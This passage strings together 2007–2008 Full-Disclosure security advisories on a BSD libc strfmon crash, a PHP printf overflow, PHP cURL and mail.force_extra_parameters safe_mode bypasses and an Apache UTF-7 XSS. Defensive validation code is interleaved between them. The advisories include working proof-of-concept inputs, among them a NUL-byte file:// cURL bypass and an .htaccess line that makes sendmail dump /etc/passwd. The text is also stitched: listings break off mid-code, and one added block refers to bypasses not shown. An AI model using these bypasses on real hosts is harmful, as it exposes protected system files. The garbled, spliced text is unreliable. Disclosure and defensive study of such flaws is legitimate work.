NOT LIST ALL VULNERABLE FUNCTIONS

--- 2. How to fix ---
Do not use safe_mode as the main safeguard

--- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl


[Full-disclosure] [securityreason] *BSD libc (strfmon) Multiple vulnerabilities

2008-03-28 Thread Maksymilian Arciemowicz

[ *BSD libc (strfmon) Multiple vulnerabilities ]

Author: Maksymilian Arciemowicz (cxib)
SecurityReason.com
Date:
- Written: 10.03.2008
- Public:  25.03.2008

SecurityReason Research
SecurityAlert Id: 53

CVE: CVE-2008-1391
SecurityRisk: High

Affected Software: 
FreeBSD lines: 6,7
NetBSD 4
other systems that use these functions.
Standard C Library (libc, -lc) for BSD
probably some MacOS version

Advisory URL:
http://securityreason.com/achievement_securityalert/53
Vendor: http://www.php.net

--- 0. Description ---
strfmon -- convert monetary value to string

The strfmon() function places characters into the array pointed to by s as 
controlled by the string pointed to by format.  No more than maxsize bytes are 
placed into the array.

The format string is composed of zero or more directives: ordinary characters 
(not %), which are copied unchanged to the output stream; and conversion 
specifications, each of which results in fetching zero or more subsequent 
arguments.  Each conversion specification is introduced by the % character.

SYNOPSIS:

#include <monetary.h>

 ssize_t
 strfmon(char * restrict s, size_t maxsize, const char * restrict format,
 ...);

--- 1. /usr/src/lib/libc/stdlib/strfmon.c - Integer Overflow ---
The main problem and vulnerability exist in the strfmon() function. When we use 
this function in an example program:

---example-start--
#include <stdio.h>
#include <monetary.h>

int main(int argc, char* argv[]){
    char buff[51];
    char *bux=buff;
    ssize_t res;

    if (argc < 2)
        return 1;                 /* the format string comes from argv[1] */
    /* argv[1] is passed straight through as the format: that is the point
     * of this PoC. The value argument of strfmon() must be a double. */
    res=strfmon(bux, 50, argv[1], 0.0);
    (void)res;
    return 0;
}
---example-end--

and compile it, we can manipulate the format string.

Let's try to run the example:
cxib# ./pln %n
Segmentation fault (core dumped)

What is wrong? Let's see

cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %n
Starting program: /cxib/C/pln %n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)

memmove() performs a bad memory reallocation.

cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %.99n
Starting program: /cxib/C/pln %.99n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7


The next example is:

cxib# ./pln %#n

Long execution time. Let's check this process:
--
cxib# ps -aux | grep pln
cxib   1843 89.1 13.2 140320 119588  p2  R+4:29PM   0:09.68 ./pln %#n
cxib# ps -aux | grep pln
cxib   1843 94.7 48.4 482336 438236  p2  R+4:29PM   1:54.07 ./pln %#n

1 VSZ=140320
2 VSZ=482336

--

Why? pln will allocate more memory than we have. PHP uses strfmon() in the 
money_format() function. When we use mod_php5 in apache, we can create an example 
exploit.. the result will be:

---apache-child-die---
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap 
space
---apache-child-die---

The difference between %n and (%#n or %.99n) is "#" or "."

 o   A `#' sign followed by a decimal number specifying the maximum
 expected number of digits after the radix character.
 o   A `.' character followed by a decimal number specifying the number
 the number of digits after the radix character.

Let's see the source of the strfmon() function:

---strfmon()-start---
ssize_t
strfmon(char * __restrict s, size_t maxsize, const char * __restrict format,
    ...)
{
    va_list ap;
    char *dst;              /* output destination pointer */
    const char *fmt;        /* current format position pointer */
    struct lconv *lc;       /* pointer to lconv structure */
    char *asciivalue;       /* formatted double pointer */

    int flags;              /* formatting options */
    int pad_char;           /* padding character */
    int pad_size;           /* pad size */
    int width;              /* field width */
    int left_prec;          /* left precision */
    int right_prec;         /* right precision */
    double value;           /* just value */
    char space_char = ' ';  /* space after currency */

    char cs_precedes,       /* values gathered from struct lconv */
        sep_by_space,
        sign_posn,
        *signstr,
        *currency_symbol;

    char *tmpptr;           /* temporary vars */
    int

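The %n, %#n and %.99n cases above differ only in the width and precision fields that reach strfmon() unchecked. As an added example (not libc, FreeBSD or PHP code), the validator below parses the strfmon conversion grammar and bounds every numeric field before a format is passed on; MONEY_FIELD_MAX is an assumed policy value and the wrapper calls strfmon() only for formats that pass.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <sys/types.h>
#include <monetary.h>

/* Largest width or precision we will pass on to strfmon(): an assumed
 * policy bound, far beyond what a real amount needs. */
#define MONEY_FIELD_MAX 64

/* Parse an optional decimal field at *p. Returns the value, -1 if there is
 * no digit, or -2 as soon as the value exceeds MONEY_FIELD_MAX. */
static int read_field(const char **p)
{
    if (**p < '0' || **p > '9')
        return -1;
    long v = 0;
    while (**p >= '0' && **p <= '9') {
        v = v * 10 + (**p - '0');
        if (v > MONEY_FIELD_MAX)
            return -2;                   /* bail before any wider digit run */
        (*p)++;
    }
    return (int)v;
}

/* Validate a strfmon() format against the grammar
 *   %[flags][width][#left][.right]{i|n}   or   %%
 * with flags drawn from "=f ^ + ( ! -". A "#" or "." must be followed by
 * digits, and every number must be <= MONEY_FIELD_MAX. Returns the count of
 * value conversions (i or n), or -1 if the format is rejected. */
int strfmon_format_check(const char *fmt)
{
    int conversions = 0;
    const char *p = fmt;
    while (*p) {
        if (*p != '%') { p++; continue; }
        p++;
        if (*p == '%') { p++; continue; }          /* literal percent */
        for (;;) {                                  /* flags */
            if (*p == '=') {
                if (p[1] == '\0') return -1;        /* "=" needs a fill char */
                p += 2;
            } else if (*p && strchr("^+(!-", *p)) {
                p++;
            } else {
                break;
            }
        }
        if (read_field(&p) == -2) return -1;         /* width too large */
        if (*p == '#') { p++; if (read_field(&p) < 0) return -1; }  /* "#n" */
        if (*p == '.') { p++; if (read_field(&p) < 0) return -1; }  /* ".99n" */
        if (*p != 'i' && *p != 'n') return -1;       /* conversion character */
        p++;
        conversions++;
    }
    return conversions;
}

/* Format one amount only through a format that passed the check and holds
 * exactly one value conversion; returns -1 without calling strfmon() otherwise. */
ssize_t format_money_checked(char *buf, size_t cap, const char *fmt, double value)
{
    if (strfmon_format_check(fmt) != 1)
        return -1;
    return strfmon(buf, cap, fmt, value);
}

int main(void)
{
    /* Constructed sample formats, including the three from the advisory. */
    const char *samples[] = { "%n", "%#n", "%.99n", "%=*#10.2n", "%2147483647n" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s -> %s\n", samples[i],
               strfmon_format_check(samples[i]) < 0 ? "rejected" : "accepted");
    return 0;
}
```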
[Full-disclosure] {securityreason.com}PHP 5 *printf() - Integer Overflow

2008-03-21 Thread Maksymilian Arciemowicz

[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
- Written: 01.03.2008
- Public: 20.03.2008

SecurityReason Research
SecurityAlert Id: 52

CVE-2008-1384
SecurityRisk: Low

Affected Software: PHP 5.2.5 and prior
Advisory URL:
http://securityreason.com/achievement_securityalert/52
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write 
dynamically generated pages quickly.

These functions all manipulate strings in various ways. Some more 
specialized sections can be found in the regular expression and URL 
handling sections.

For information on how strings behave, especially with regard to usage of 
single quotes, double quotes, and escape sequences, see the Strings entry 
in the Types section of the manual.

--- 1. *printf() functions Integer Overflow ---
The main problem exists in the formatted_print.c file.

cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 
UTC 2008 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC  i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php

cxib# php /www/printf.php
Segmentation fault (core dumped)

Good. Let's look at the php_sprintf_appendstring() function in the 
formatted_print.c file

---formatted_print.c-start---
inline static void
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,
                         int min_width, int max_width, char padding,
                         int alignment, int len, int neg, int expprec,
                         int always_sign)
---formatted_print.c-end---

The main variable we will look at is "npad"


---formatted_print.c-start---
copy_len = (expprec ? MIN(max_width, len) : len);
npad = min_width - copy_len;
---formatted_print.c-end---

good. npad is 2147483646


---formatted_print.c-start---
req_size = *pos + MAX(min_width, copy_len) + 1;
---formatted_print.c-end---

req_size overflows

---formatted_print.c-start---
if (req_size > *size) {
    while (req_size > *size) {
        *size <<= 1;
    }
    PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n",
                  *size));
    *buffer = erealloc(*buffer, *size);
}
---formatted_print.c-end---

(req_size > *size) is False

(alignment == ALIGN_RIGHT) is True so

---formatted_print.c-start---
while (npad-- > 0) {
    (*buffer)[(*pos)++] = padding;
}
---formatted_print.c-end---

and finish. Let's debug it with gdb

--- Debug ---
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c,
    size=0xbfbfd324, add=0x28f20404 'A' ...,
    min_width=2147483646, max_width=0, padding=65 'A', alignment=1, len=1,
    neg=0, expprec=0, always_sign=0)

..

0x290fff0c:  'A' ...
0x290fffd4:  'A'  
0x2910:  
--- Debug ---

The script will allocate a lot of data in memory.

Tested on:
PHP 5.2.5
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 
UTC 2008 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC  i386

and
PHP 5.1.6
[EMAIL PROTECTED] ~ $ uname -a
NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006  

[EMAIL PROTECTED]:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826
Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENE
RIC  sparc64

--- 2. Exploit ---
SecurityReason will not publish an official exploit for this issue.

--- 3. How to fix ---
CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup

--- 4. Greets ---
sp3x Infospec p_e_a Chujwamwdupe schain and Stanislav Malyshev (Patch)

--- 5. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg [NEW KEY]
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg.old [OLD 
KEY]
http://securityreason.com
http://securityreason.pl


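The wrap the advisory traces (req_size going negative so that (req_size > *size) is false, followed by the size-doubling loop) can be made to fail closed instead. Added example, not PHP's code: the same arithmetic with overflow checks, applied to the min_width and len values from the gdb output above; pos = 1 and the initial buffer size of 240 are assumed values, and the function names are hypothetical.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

#define MAX(a, b) ((a) > (b) ? (a) : (b))

/* The value the advisory's expression yields once it wraps: computed in
 * unsigned arithmetic and converted back, which is the two's-complement
 * result the int version produces in practice. */
int req_size_wrapped(int pos, int min_width, int copy_len)
{
    unsigned int w = (unsigned int)MAX(min_width, copy_len);
    return (int)((unsigned int)pos + w + 1u);
}

/* Checked replacement: fails instead of wrapping. Every operand must be
 * non-negative and pos + width + 1 must not exceed INT_MAX. */
bool req_size_checked(int pos, int min_width, int copy_len, int *out)
{
    if (pos < 0 || min_width < 0 || copy_len < 0)
        return false;
    int width = MAX(min_width, copy_len);
    if (width > INT_MAX - 1 || pos > INT_MAX - 1 - width)
        return false;
    *out = pos + width + 1;
    return true;
}

/* Checked buffer growth: the page's "while (req_size > *size) *size <<= 1;"
 * also wraps once *size passes INT_MAX / 2; stop and report instead. */
bool grow_checked(int *size, int req_size)
{
    if (*size <= 0)
        return false;
    while (req_size > *size) {
        if (*size > INT_MAX / 2)
            return false;
        *size <<= 1;
    }
    return true;
}

/* Mirrors the sequence in php_sprintf_appendstring() with the checks in
 * place: returns the new buffer size, or -1 when the request cannot be
 * satisfied and the caller should refuse the conversion. */
int append_plan(int pos, int size, int min_width, int copy_len)
{
    int req_size;
    if (!req_size_checked(pos, min_width, copy_len, &req_size))
        return -1;
    if (!grow_checked(&size, req_size))
        return -1;
    return size;
}

int main(void)
{
    /* min_width and len as in the advisory's gdb output; pos = 1 is an
     * assumed value (one byte already written to the output buffer). */
    int min_width = 2147483646, copy_len = 1;
    printf("wrapped req_size for pos=1: %d\n", req_size_wrapped(1, min_width, copy_len));
    printf("checked plan for pos=1: %d\n", append_plan(1, 240, min_width, copy_len));
    printf("checked plan for pos=0: %d\n", append_plan(0, 240, min_width, copy_len));
    printf("ordinary request: %d\n", append_plan(10, 240, 500, 3));
    return 0;
}
```

With pos = 0 the addition itself still fits (req_size == INT_MAX), but the doubling loop can never reach it, so the checked growth is what refuses that case.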

[Full-disclosure] PHP 5.2.5 cURL safe_mode bypass

2008-01-22 Thread Maksymilian Arciemowicz

[PHP 5.2.5 cURL safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- Written: 21.08.2007
- Public: 22.01.2008

SecurityReason Research
SecurityAlert Id: 51

CVE: CVE-2007-4850
SecurityRisk: Medium

Affected Software: PHP 5.2.4 and 5.2.5
Advisory URL:
http://securityreason.com/achievement_securityalert/51
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to 
connect and communicate to many different types of servers with many different 
types of protocols. libcurl currently supports the http, https, ftp, gopher, 
telnet, dict, file, and ldap protocols. libcurl also supports HTTPS 
certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with 
PHP's ftp extension), HTTP form based upload, proxies, cookies, and 
user+password authentication.

These functions have been added in PHP 4.0.2. 

--- 1. cURL ---
This is very similar to CVE-2006-2563. 

http://securityreason.com/achievement_securityalert/39


The first issue [SAFE_MODE bypass]

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));

is caused by error in curl/interface.c

---
#define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret)                                       \
    if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) &&                      \
        strncasecmp(str, "file:", sizeof("file:") - 1) == 0)                               \
    {                                                                                      \
        php_url *tmp_url;                                                                  \
                                                                                           \
        if (!(tmp_url = php_url_parse_ex(str, len))) {                                     \
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid URL '%s'", str);          \
            php_curl_ret(__ret);                                                           \
        }                                                                                  \
                                                                                           \
        if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str + len)) {          \
            php_error_docref(NULL TSRMLS_CC, E_WARNING,                                    \
                             "URL '%s' contains unencoded control characters", str);       \
            php_url_free(tmp_url);                                                         \
            php_curl_ret(__ret);                                                           \
        }                                                                                  \
                                                                                           \
        if (tmp_url->query || tmp_url->fragment ||                                         \
            php_check_open_basedir(tmp_url->path TSRMLS_CC) ||                             \
            (PG(safe_mode) && !php_checkuid(tmp_url->path, "rb+",                          \
                                            CHECKUID_CHECK_MODE_PARAM))                    \
        ) {                                                                                \
            php_url_free(tmp_url);                                                         \
            php_curl_ret(__ret);                                                           \
        }                                                                                  \

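The three safe_mode bypasses above (chdir()/ftok() with an "http:" subdirectory, posix_access() where expand_filepath() resolves a different path than the one handed to php_checkuid_ex(), and cURL's file: URL with an embedded NUL) share one root cause: the check runs on a different string than the one the operation uses. The added example below, not code from PHP or from the advisories, rejects embedded NUL bytes, canonicalizes the path textually and only then compares it against the allowed base directory; canonicalize_path() and file_url_allowed() are hypothetical helpers written for this example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Hypothetical helper: textual canonicalization of an absolute path.
 * Collapses "//", "/./" and "/../" without consulting the filesystem and
 * never climbs above "/". Returns false if in is not absolute or the
 * result does not fit in out (capacity cap). */
bool canonicalize_path(const char *in, char *out, size_t cap)
{
    if (in[0] != '/' || cap < 2)
        return false;
    size_t o = 0;
    out[o++] = '/';                        /* out ends in '/' while building */
    const char *p = in;
    while (*p) {
        while (*p == '/')
            p++;                           /* skip runs of separators */
        if (!*p)
            break;
        const char *seg = p;
        while (*p && *p != '/')
            p++;
        size_t len = (size_t)(p - seg);
        if (len == 1 && seg[0] == '.')
            continue;                      /* "." is a no-op */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (o > 1) {                   /* ".." pops one segment, never "/" */
                o--;
                while (o > 0 && out[o - 1] != '/')
                    o--;
            }
            continue;
        }
        if (o + len + 1 >= cap)
            return false;
        memcpy(out + o, seg, len);
        o += len;
        out[o++] = '/';
    }
    if (o > 1)
        o--;                               /* drop trailing '/' except for root */
    out[o] = '\0';
    return true;
}

/* Hypothetical helper: decide whether a file: URL (NUL-terminated str, with
 * len being the length the caller believes it has) may be opened under
 * basedir. The order is the point: reject an embedded NUL first, then
 * canonicalize, then compare, so the path that is checked is the path that
 * would be used. resolved (capacity cap) receives the canonical path. */
bool file_url_allowed(const char *str, size_t len, const char *basedir,
                      char *resolved, size_t cap)
{
    static const char scheme[] = "file://";
    const size_t slen = sizeof scheme - 1;

    /* 1. strlen()-based and length-based code would disagree about a
     *    string with an embedded NUL; refuse it outright. */
    if (memchr(str, '\0', len) != NULL)
        return false;
    /* 2. Only file: URLs with an empty host, so the remainder is a local path. */
    if (len < slen || strncasecmp(str, scheme, slen) != 0)
        return false;
    /* 3. Canonicalize; a relative path such as "../../etc" fails here. */
    if (!canonicalize_path(str + slen, resolved, cap))
        return false;
    /* 4. Compare on a directory boundary so "/www" does not admit "/wwwx". */
    size_t blen = strlen(basedir);
    if (blen > 0 && basedir[blen - 1] == '/')
        blen--;                            /* tolerate a trailing slash */
    if (strncmp(resolved, basedir, blen) != 0)
        return false;
    return resolved[blen] == '\0' || resolved[blen] == '/';
}

int main(void)
{
    /* Constructed sample URLs; the third carries an embedded NUL. */
    static const char nul_url[] = "file://safe_mode_bypass\0/www/index.php";
    const char *ok = "file:///www/a/../b.txt", *up = "file:///www/../etc/passwd";
    char out[256];
    printf("%s -> %s\n", ok, file_url_allowed(ok, strlen(ok), "/www", out, sizeof out) ? out : "denied");
    printf("%s -> %s\n", up, file_url_allowed(up, strlen(up), "/www", out, sizeof out) ? out : "denied");
    printf("URL with embedded NUL -> %s\n",
           file_url_allowed(nul_url, sizeof nul_url - 1, "/www", out, sizeof out) ? out : "denied");
    return 0;
}
```
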
[Full-disclosure] PHP 5.2.4 mail.force_extra_parameters unsecure

2007-11-25 Thread Maksymilian Arciemowicz

[PHP 5.2.4 mail.force_extra_parameters unsecure ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- Written: 06.09.2007
- Public: 0x.0x.2007

SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.
When using PHP as an Apache module, you can also change the configuration 
settings using directives in Apache configuration files (e.g. httpd.conf) and 
.htaccess files. You will need "AllowOverride Options" or "AllowOverride All" 
privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with PHP_INI_ALL 
and PHP_INI_PERDIR type directives. To clear a previously set value use none as 
the value.
Note: Don't use php_value to set boolean values. php_flag (see below) should be 
used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only with 
PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified parameters to 
be passed as extra parameters to the sendmail binary. These parameters will 
always replace the value of the 5th parameter to mail(), even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

--- 1. htaccess safemode and open_basedir Bypass Vulnerability per mail.force_extra_parameters ---

We have received a lot of questions about the news 
http://securityreason.com/news/0/0x1f . And we will show how to exploit this 
issue. When using PHP as an Apache module, you can also change the 
configuration settings using directives in the .htaccess file. But it is possible 
to bypass safe_mode or open_basedir via mail.force_extra_parameters. On a lot 
of servers there is sendmail, it can also be exim etc. But we show how to exploit this 
for a famous mail server (SENDMAIL).

For example you can set mail.force_extra_parameters via .htaccess.

cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 and PHP 5.2.4. Let's see folder "/narkotyk" in localhost:82.

cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
-rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
-rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
-rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php


cxib# curl http://localhost:82/narkotyk/file1.php

Warning: include() [function.include]: 
SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to 
access /etc/passwd owned by uid 0 in 
/usr/local/www/apache22/data/narkotyk/file1.php on line 1

Warning: include(/etc/passwd) [function.include]: failed to open stream: Invalid 
argument in /usr/local/www/apache22/data/narkotyk/file1.php on line 
1

Warning: include() [function.include]: 
Failed opening '/etc/passwd' for inclusion (include_path='.:') in 
/usr/local/www/apache22/data/narkotyk/file1.php on line 1

so safe_mode is enabled.
Let's see files .htaccess and file2.php

cxib# cat file2.php

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt'

and let's send request to file2.php

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

False!? No 

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
-rw-r--r-- 1 www www 7130 Sep 7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created.

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie 
&:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line 
"toor:*:0:0:Bourne-again Superuser:/root:"
 etc.

We can read the file, and safe_mode and open_basedir are bypassed.

It is possible to create a file with PHP code. But we need to have a sendmail.cf to send 
email.

Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
allo", "root")); ?>

We need to create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure 
this file. Then

cxib# curl http://localhost:8

[Full-disclosure] Apache2 Undefined Charset UTF-7 XSS Vulnerability

2007-09-12 Thread Maksymilian Arciemowicz

[Apache2 Undefined Charset UTF-7 XSS Vulnerability ]

Author: SecurityReason
Maksymilian Arciemowicz (cXIb8O3)

Date:
- Written: 08.08.2007
- Public: 11.09.2007

SecurityReason Research
SecurityAlert Id: 46

CVE: CVE-2007-4465
SecurityRisk: Low

Affected Software: Apache 2.x (mod_autoindex)
Advisory URL: http://securityreason.com/achievement_securityalert/46
Vendor: http://httpd.apache.org

--- 0. Description ---

The Apache HTTP Server Project is an effort to develop and maintain an 
open-source HTTP server for modern operating systems including UNIX and 
Windows NT. The goal of this project is to provide a secure, efficient and 
extensible server that provides HTTP services in sync with the current HTTP 
standards.

Apache has been the most popular web server on the Internet since April 
1996. The November 2005 Netcraft Web Server Survey found that more than 70% 
of the web sites on the Internet are using Apache, thus making it more 
widely used than all other web servers combined.

--- 1. Apache2 XSS Undefined Charset UTF-7 XSS Vulnerability ---

The XSS (UTF-7) exists in mod_autoindex.c. The charset is not defined and we can 
perform an XSS attack using the "P" option available in apache 2.2.4 by setting the 
charset to UTF-7.

"P=pattern lists only files matching the given pattern"

More : http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html

--Source code from mod_autoindex.c--
#if APR_HAS_UNICODE_FS
ap_set_content_type(r, "text/html;charset=utf-8");
#else
ap_set_content_type(r, "text/html");
#endif
--Source code from mod_autoindex.c--


If APR_HAS_UNICODE_FS is set to 1 then we have a defined charset, and this is 
present on Windows systems. But on unix, linux systems the charset is 
not defined.

--- EXAMPLE 1 ---
# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'

GET /icons/ http/1.1
Host: localhost
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive


HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 
OpenSSL/0.9.7j
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html





Index of /icons


Index of /icons
..
--- EXAMPLE 1 ---

--- EXAMPLE 2 ---
# telnet httpd.apache.org 80
Trying 140.211.11.130...
Connected to httpd.apache.org.
Escape character is '^]'.

GET /icons/ http/1.1
Host: httpd.apache.org
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive


HTTP/1.1 200 OK
Date: Wed, 08 Aug 2007 23:06:26 GMT
Server: Apache/2.3.0-dev (Unix)
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html





Index of /icons


Index of /icons
..
--- EXAMPLE 2 ---

Any request to the folder /icons doesn't give a charset in the main header nor in 
the head section. In responses like 400, 404 etc. the charset is defined 
(standard UTF8).

For example :

--- EXAMPLE 3 (400) ---
# telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /%0 HTTP/1.1
Host: localhost

HTTP/1.1 400 Bad Request
Date: Thu, 09 Aug 2007 13:13:32 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 
OpenSSL/0.9.7j
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
..
- --- EXAMPLE 3 ---

- --- EXAMPLE 4 (404) ---
# telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /noex HTTP/1.1
Host: localhost

HTTP/1.1 404 Not Found
Date: Thu, 09 Aug 2007 13:14:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 
OpenSSL/0.9.7j
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
..
- --- EXAMPLE 4 ---

Any request from the 4xx family is defined with a charset, because it is possible 
to put text into the page (like a wrong path) in a 404. The main idea was that 
nobody can put any text into this page with a folder listing. It was a good idea, 
but in Apache 2.x the "P" option exists.
Like:

http://localhost/icons/?P=[Filter]

Any value given to this variable is displayed in the HTML text. For example:

http://localhost/icons/?P=Hallo

- --- HTML 
 Name
- -

- --- 2. Exploit ---

SecurityReason is not going to release an exploit to the general public.
The exploit was provided and tested for the Apache Team.

- --- 3. How to fix ---

Update to Apache 2.2.6

http://www.apache.org/dist/httpd/CHANGES_2.2.6

- ---
mod_autoindex: Add in Type and Charset options to IndexOptions
directive. This allows the admin to explicitly set the
content-type and charset of the generated page and is therefore
a viable workaround for buggy browsers affected by CVE-2007-4465
(cve.mitre.org). [Jim Jagielski]
- ---

- --- 4. Greets ---

For: sp3x, Infospec, p_e_a

- --- 5. Contact ---

Author: Securi
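As an added example (not code from the advisory above): a Python check that parses a raw HTTP response and reports whether an HTML page declares its charset in the Content-Type header or in a <meta> tag, which is what the /icons listings in EXAMPLE 1 and 2 lack and the 400/404 pages have. The three sample responses are constructed from EXAMPLE 1, EXAMPLE 3 and the IndexOptions Charset fix named in section 3; their bodies are unchunked for simplicity.

```python
import re

# Constructed sample responses modelled on EXAMPLE 1 and EXAMPLE 3 of the
# advisory. Only the headers and the presence or absence of a charset matter.
LISTING_NO_CHARSET = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.3.0-dev (Unix)\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><head><title>Index of /icons</title></head>"
    b"<body><h1>Index of /icons</h1></body></html>"
)
ERROR_WITH_CHARSET = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
    b"<html><head><title>400 Bad Request</title></head></html>"
)
# A listing with the charset pinned in the document itself; Apache 2.2.6's
# IndexOptions Charset=... (section 3) pins it in the header instead, and the
# APR_HAS_UNICODE_FS build already sends text/html;charset=utf-8.
LISTING_FIXED_META = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b'<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
    b"<title>Index of /icons</title></head></html>"
)

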